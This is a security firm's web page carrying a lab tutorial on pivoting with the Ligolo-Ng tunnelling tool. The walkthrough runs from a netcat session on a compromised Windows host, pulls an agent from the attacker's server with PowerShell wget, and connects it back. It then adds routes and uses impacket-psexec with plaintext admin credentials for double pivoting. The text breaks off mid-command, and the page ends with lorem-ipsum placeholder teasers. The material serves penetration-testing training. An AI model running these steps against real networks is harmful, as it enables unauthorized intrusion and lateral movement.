At Deepwatch, " Empowering Your Digital Defense, Ensuring Your Peace of Mind"

Category: Database Hacking

A Detailed Guide on Ligolo-Ng

A Detailed Guide on Ligolo-Ng

This comprehensive guide delves into the intricacies of Lateral Movement utilizing Ligolo-Ng, a tool developed by Nicolas Chatelain. The Ligolo-Ng tool facilitates the establishment of tunnels through reverse TCP/TLS connections using a tun interface, avoiding the necessity of SOCKS. This guide covers various aspects, from the tool’s unique features to practical applications such as single and double pivoting within a network. Download Ligolo-Ng: Ligolo-Ng can be downloaded from the official repository: Ligolo-Ng Releases. Table of Contents: Ligolo-Ng Overview: Ligolo-Ng is a lightweight and efficient tool designed to enable penetration testers to establish tunnels through reverse TCP/TLS connections, employing a tun interface. Noteworthy features include its GO-coded nature, VPN-like behavior, customizable proxy, and agents in GO. The tool supports multiple protocols, including ICMP, UDP, SYN stealth scans, OS detection, and DNS Resolution, offering connection speeds of up to 100 Mbits/sec. Ligolo-Ng minimizes maintenance time by avoiding tool residue on disk or in memory. Ligolo V/S Chisel: Lab Setup Follow the step-by-step guide for lateral movement within a network, covering both single and double pivoting techniques. Prerequisites Obtain the Ligolo ‘agent’ file for Windows 64-bit and the ‘proxy’ file for Linux 64-bit. Install the ‘agent’ file on the target machine and the ‘proxy’ file on the attacking machine (Kali Linux). Setting up Ligolo-Ng Step 1: Following the acquisition of both the agent and proxy files, the next step involves the setup of Ligolo-Ng. To ascertain the current status of Ligolo-Ng configuration, the ‘ifconfig’ command is employed. To initiate activation, execute the prescribed sequence of commands as follows: ip tuntap add user root mode tun ligolo ip link set ligolo up Verify Ligolo-Ng activation with: ‘ifconfig’ command Step2: Unzip the Ligolo proxy file: tar -xvzf ligolo-ng_proxy_0.5.1_linux_amd64.tar.gz This proxy file facilitates the establishment of a connection through Ligolo, enabling us to execute subsequent pivoting actions. To explore the full range of options available in the proxy file, utilize the ‘help’ command ./proxy -h Step 3: The options displayed in the preceding image are designed for incorporating various types of certificates with the proxy. The chosen approach involves utilizing the ‘-selfcert’ option, which operates on port 11601. Execute the provided command, as illustrated in the accompanying image below: ./proxy -selfcert Step 4: By executing the aforementioned command, Ligolo-Ng becomes operational on the attacking machine. Subsequently, to install the Ligolo agent on the target machine, unzip the ligolo agent file using the command: unzip ligolo-ng_agent_0.5.1_windows_amd64.zip To facilitate the transmission of this agent file to the target, establish a server with the command: updog -p 80 Step 5: In the context of lateral movement, a session has been successfully acquired through netcat. Utilizing the established netcat connection, the next step involves downloading the Ligolo agent file onto the target system. Referencing the image below, execute the provided sequence of commands: cd Desktop powershell wget 192.168.1.5/agent.exe -o agent.exe dir Step 6: Evidently, the agent file has been successfully downloaded. Given that the proxy file is presently operational on Kali, the subsequent action involves executing the agent file. ./agent.exe -connect 192.168.1.5:11601 -ignore-cert Upon executing the specified command, a Ligolo session is initiated. Subsequently, employ the ‘session’ command, opting for ‘1’ to access the active session. Following the session establishment, execute the ‘ifconfig’ command as illustrated in the provided image. Notably, it discloses the existence of an internal network on the server, denoted by the IPv4 Address 192.168.148.130/24. This discovery prompts further exploration into creating a tunnel through this internal network in the subsequent steps. Single Pivoting In the single pivoting scenario, the aim is to access Network B while staying within the boundaries of Network                                  Attempting a direct ping to Network B reveals, as illustrated in the image below, the impossibility due to different network configuration. To progress towards the single pivoting objective, a new terminal window will be opened. Subsequently, the internal IP will be added to the IP route, and the addition will be confirmed, as illustrated in the image below, utilizing the following commands: ip route add 192.168.148.0/24 dev ligolo ip route list Return to the Ligolo proxy session window and initiate the tunneling process by entering the ‘start’ command, as demonstrated in the provided image. Upon establishing a tunnel into network B, we executed the netexec command to scan the network B subnet, unveiling an additional Windows 10 entity distinct from DC1, as depicted in the image. Upon attempting to ping the IP now, successful ping responses will be observed, a contrast to the previous unsuccessful attempts. Additionally, a comprehensive nmap scan can be conducted, as illustrated in the image below. Double Pivoting In the process of double pivoting, our objective is to gain access to Network C from Network A, utilizing Network B as an intermediary. From the newly opened terminal window, utilize the Impacket tool to access the identified Windows 10 with the IP 192.168.148.132. Following this, execute the subsequent set of commands to download the Ligolo agent onto Windows 10 Impacket-psexec administrator:123@192.168.148.132 cd c:\users\public powershell wget 192.168.1.5/agent.exe -o agent.exe dir Subsequently, initiate the execution of the agent.exe. Upon completion, a session will be established, given that our Ligolo proxy file is already operational. agent.exe -connect 192.168.1.5:11601 -ignore-cert Examine Ligolo-ng proxy server, a new session, corresponding to Windows 10, will be present, as indicated in the accompanying image. Execute the ‘start’ command to initiate additional tunnelling. Execute the ‘session’ command to display the list of sessions. Navigate through the sessions using arrow keys, selecting the desired session for access. In this instance, the aim is to access the latest session, identified as session 2. Select this session and utilize the ‘ifconfig’ command to inspect the interfaces. This action reveals an additional network C interface with the address 192.168.159.130/24, mirroring the details depicted in the image below. Upon identifying the new network, the initial step involves attempting a ping. However, the image below indicates an absence of connectivity between Kali and the network C. Add the Network C Subnet in the IP route list with the following command. ip

Read More
DHS Issues Emergency Directive To Prevent Hacking Attack

DHS Issues Emergency Directive To Prevent Hacking Attack

Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolorer

Read More
Drughydrus Add Google Drive To Roughrobin Torjan

Drughydrus Add Google Drive To Roughrobin Torjan

Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolorer

Read More
× Live Chat